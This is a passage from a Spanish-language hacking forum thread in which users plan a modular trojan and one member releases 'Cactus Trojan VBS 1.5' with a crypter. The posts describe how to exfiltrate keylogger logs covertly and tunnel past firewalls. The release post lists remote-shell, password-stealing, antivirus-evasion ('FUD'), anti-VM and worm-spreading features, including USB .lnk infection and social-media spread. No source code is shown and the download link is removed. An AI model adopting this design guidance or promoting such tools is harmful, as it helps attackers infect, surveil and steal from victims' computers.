Mostrar mensajes previos
Ordenar por
por shinichi_kudo Esquizofrénico
estoy de acuerdo que no uses FTP por eso te mencionaba la alternativa de SFTP/SCP.
qe encriptes el archivo de log esta muy bien.
si lo envias por HTTP es posible decodificarlo, teniendo tu cliente, si bien no es malo hacerlo con base64 es algo que usan mucho, tampoco eso muy seguro.
y no te olvides que en el trafico web una peticion con hhttp base64 se veria.

coincido que es lo mas facil enviarlo por web como decis, pero son metodos conocidos que se pueden rastrear.

lo mas seguro seria usar un metodo de transporte encriptado y dentro de esa encapsulacion del protocolo ( sea SFTP/SCP o un protocolo tuyo )
quizas haciendo un tunnel over https tambien.
tambien hay que tomar el factor de los puertos de una intranet que solo estarian permitidos los de WEB services.
estaria bueno encontrarle una buena vuelta a esa parte y tambien usar lo que hacen otros troyanos, que te dan la posibilidad de descargarlo por el client.

saludos y ojala entre todos saquemos un buen desarrollo tirandote ideas y vos pudiendo implementarlas
por shinichi_kudo Esquizofrénico
otra cosa que se me ocurre mirando el comentario de poseidon.

estaria bueno hacer un troyano modular, con eso agilizarias lo que dice el.
por ej..
hacer un build server con funciones basicas como : explorar archivos, cmd.
y otro server con funciones como : mensajes remotedesktop, keylogger.

osea por modulo. construis un server y vos elegis que funciones queres meter dentro de el. no se si he visto troyanos que tengan esas funciones.

saludos !
por MadAntrax Sin sí­ntomas
xxxPoseidonxxx escribió:yo sinceramente veo innecesario, keylogger, webcam y cosas así, eso le quita potencial estabilidad etc.
A mi tampoco me gusta, por lo que voy a crear un plug-in para dichas opciones.
shinichi_kudo escribió:otra cosa que se me ocurre mirando el comentario de poseidon.

estaria bueno hacer un troyano modular, con eso agilizarias lo que dice el.
por ej..
hacer un build server con funciones basicas como : explorar archivos, cmd.
y otro server con funciones como : mensajes remotedesktop, keylogger.

osea por modulo. construis un server y vos elegis que funciones queres meter dentro de el. no se si he visto troyanos que tengan esas funciones.

saludos !
Exacto, eso es lo que tengo pensado hacer. El server será VBS puro y duro, con las opciones que ya están implementadas: cmdshell, filemanager, etc. Luego programaré 2 plugins avanzados:

cactus.vbs (11kb aprox) >>> File/Process/Services Manager, Downloader, Cmd-Shell, VBS-Exec, Fun Stuff, Server Admin/Updater, w0rm spread
adv-plugin.dll (70kb aprox) >>> Desktop Spy, Webcam Spy, Chat, Password Stealer, etc...
keylogger.dll (30kb aprox) >>> Keyloger por Hooks, Capturar titulo de la ventana (WindowText) en el log, encriptación por llave.

El troyano será completamente funcional con el cactus.vbs, una vez troyanizada la victima, podrás subir el plug-in que desees para expandir las funcionalidades. Mejor así? Y no voy a programar ningñun tunel o encriptación hardcore. Un simple modRC4 con llave para que solo TU puedas sacar el log y poco más... La comunicación interna entre cliente<>cactus.vbs ya está encriptada y los ficheros del File Manager están codificados en Base64.

Creo que eso ya es suficiente, al menos para sacar la primera release estable. Hay que pensar y dejar cosas para las próximas versiones, si no me pasaré meses añadiendo funciones y nunca sacaré una release "final".

Que te parece?
My skype: madantrax.vbs
por MadAntrax Sin sí­ntomas
Bueno, creo que ya está bien por hoy, he programado suficiente:

Cactus Trojan VBS 1.5 + Cactus VBS Crypter 2.0

First Release - No more betas, no more bugs
DOWNLOAD 1.5: [Enlace externo eliminado para invitados]

Imagen

Imagen

Imagen

Imagen

Imagen


Cactus Trojan VBS 1.5

Server coded 100% in VBS
Client coded 100% in VB6

- Only 11Kb (can grow to 16Kb)
- Firewall-bypass using IE.msxml.dll
- FUD, also easy to crypt
- Execute local files on remote computers
- Client memory-protection (max sockets configurable)
- Remote CMD-Shell
- Remote VBS-Execution
- Admin Server: Update, Restart, Stop, Uninstall
- File Manager: Base64 encoding, list drives by type, download & upload files, exec files, create folders, delete files & folders, rename files & folders
- Process Manager: List by Name & show PID & full Pathname, kill process
- Services Manager: List by Name & Description & full Pathname & Startmode & State, stop and start services
- Fun Manager: Open websites, Text-to-Speech, Shutdown & Reboot System, Open CD Tray

Complete server builder, full customizable:

- Can build trojans or w0rms
- 6 startup's methods
- Customize installpath and name_prefix
- Anti-VirtualMachine detection
- Built-in firewall bypass Downloader
- Dropbox Spread
- Network Spread (caution; server loads 5 min delay)
- Local Harddrives Spread
- USB Spread (.lnk infection scam)
- P2P Ares Spread
- Facebook & Twitter Spread

====================================================

This ZIP comes with "Cactus VBS Crypter 2.0", so you can crypt server.vbs easy

//MadAntrax - eof
Última edición por MadAntrax el 19 Mar 2014, 01:29, editado 1 vez en total.
My skype: madantrax.vbs
por kangel Delirios esporádicos
Por mi parte me parece perfecto que las opciones que traiga sean las basica nada del otro mundo y ya el que quiera pues que use plugins
y las versiones privadas que lleven su propio crypter y con metodos de spread y plugins mas avanzados

PD:mientras escribia este mensaje pusiste la 1.5 me parece de lujo como las dejado para mi un +10 y sigue asin compañero
otroyomismo escribió:
elivando escribió:está limpo?
En la pagina oficial no especifica si se baño o no.. pero yo no le sentí mal olor.
por MadAntrax Sin sí­ntomas
MadAntrax escribió:Bueno, creo que ya está bien por hoy, he programado suficiente:

Cactus Trojan VBS 1.5 + Cactus VBS Crypter 2.0

First Release - No more betas, no more bugs
DOWNLOAD 1.5: [Enlace externo eliminado para invitados]

Imagen

Imagen

Imagen

Imagen

Imagen


Cactus Trojan VBS 1.5

Server coded 100% in VBS
Client coded 100% in VB6

- Only 11Kb (can grow to 16Kb)
- Firewall-bypass using IE.msxml.dll
- FUD, also easy to crypt
- Execute local files on remote computers
- Client memory-protection (max sockets configurable)
- Remote CMD-Shell
- Remote VBS-Execution
- Admin Server: Update, Restart, Stop, Uninstall
- File Manager: Base64 encoding, list drives by type, download & upload files, exec files, create folders, delete files & folders, rename files & folders
- Process Manager: List by Name & show PID & full Pathname, kill process
- Services Manager: List by Name & Description & full Pathname & Startmode & State, stop and start services
- Fun Manager: Open websites, Text-to-Speech, Shutdown & Reboot System, Open CD Tray

Complete server builder, full customizable:

- Can build trojans or w0rms
- 6 startup's methods
- Customize installpath and name_prefix
- Anti-VirtualMachine detection
- Built-in firewall bypass Downloader
- Dropbox Spread
- Network Spread (caution; server loads 5 min delay)
- Local Harddrives Spread
- USB Spread (.lnk infection scam)
- P2P Ares Spread
- Facebook & Twitter Spread

====================================================

This ZIP comes with "Cactus VBS Crypter 2.0", so you can crypt server.vbs easy

//MadAntrax - eof
My skype: madantrax.vbs
por shinichi_kudo Esquizofrénico
ya se lo que es... tengo 2 interfaces con distintas IP, solo me listea el port en una interface. no podes cambiar eso en el codigo?
o agregar en el codigo que ip listar el puerto o todas las interfaces ( como hacen los servicios de linux )

saludos!
Temas similares
Odnoklassniki Open redirect por xrahitel en Manuales y Tutoriales
Open Redirect in full in chrome por xrahitel en Manuales y Tutoriales
AsyncRAT - Open Source por JohnQi en Troyanos y Herramientas
Twitter Analytics Open Redirect por xrahitel en Manuales y Tutoriales
Links sobre el tema
Variantes de tema
Responder

Volver a “Troyanos y Herramientas”